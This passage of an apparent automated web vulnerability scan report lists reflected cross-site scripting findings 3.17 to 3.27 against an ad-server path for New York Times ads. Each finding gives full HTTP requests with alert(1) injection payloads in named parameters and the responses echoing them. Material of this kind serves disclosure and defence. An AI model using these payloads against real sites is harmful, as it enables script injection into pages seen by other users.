GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=a8125"-alert(1)-"445d6a35394 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:52:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... w.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=a8125"-alert(1)-"445d6a35394http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ...[SNIP]...
|
3.17. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [goto parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fccb'-alert(1)-'facab827203 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=9fccb'-alert(1)-'facab827203 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:52:59 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... w.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=9fccb'-alert(1)-'facab827203http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\"> ...[SNIP]...
|
3.18. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c0fb'-alert(1)-'c291a30757 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=&1c0fb'-alert(1)-'c291a30757=1 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:53:39 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6759
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... .nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=&1c0fb'-alert(1)-'c291a30757=1http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\"> ...[SNIP]...
|
3.19. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be867"-alert(1)-"9ef92a9fab1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=&be867"-alert(1)-"9ef92a9fab1=1 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:53:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6763
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... .nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=&be867"-alert(1)-"9ef92a9fab1=1http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg ...[SNIP]...
|
3.20. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [opzn&page parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93369"-alert(1)-"a86203937ad was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html93369"-alert(1)-"a86203937ad&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:14 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 88564%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html93369"-alert(1)-"a86203937ad&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?bran ...[SNIP]...
|
3.21. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [opzn&page parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 973ee'-alert(1)-'aef67755056 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html973ee'-alert(1)-'aef67755056&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:18 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 88564%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html973ee'-alert(1)-'aef67755056&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?bran ...[SNIP]...
|
3.22. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [pos parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f43c6"-alert(1)-"f1d869cb71d was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAdf43c6"-alert(1)-"f1d869cb71d&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:47 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 54-728/90%3B38010000/38027757/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAdf43c6"-alert(1)-"f1d869cb71d&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm ...[SNIP]...
|
3.23. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [pos parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33049'-alert(1)-'ef4c6349c56 was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd33049'-alert(1)-'ef4c6349c56&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 54-728/90%3B38010000/38027757/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd33049'-alert(1)-'ef4c6349c56&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm ...[SNIP]...
|
3.24. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn1 parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfd08'-alert(1)-'a8a71a52983 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438fdfd08'-alert(1)-'a8a71a52983&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:52:33 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... age=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438fdfd08'-alert(1)-'a8a71a52983&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\"> ...[SNIP]...
|
3.25. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn1 parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 304c3"-alert(1)-"820c38f512d was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f304c3"-alert(1)-"820c38f512d&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:52:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... age=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f304c3"-alert(1)-"820c38f512d&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; va ...[SNIP]...
|
3.26. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn2 parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
/adj/N5295.NewYorkTimes/B4885922 |
Issue detail
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd88d'-alert(1)-'c98da69b678 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476fd88d'-alert(1)-'c98da69b678&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
|
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:51:10 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... w.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476fd88d'-alert(1)-'c98da69b678&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\"> ...[SNIP]...
|
3.27. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn2 parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://ad.vulnerable.ad.partner |
Path: |
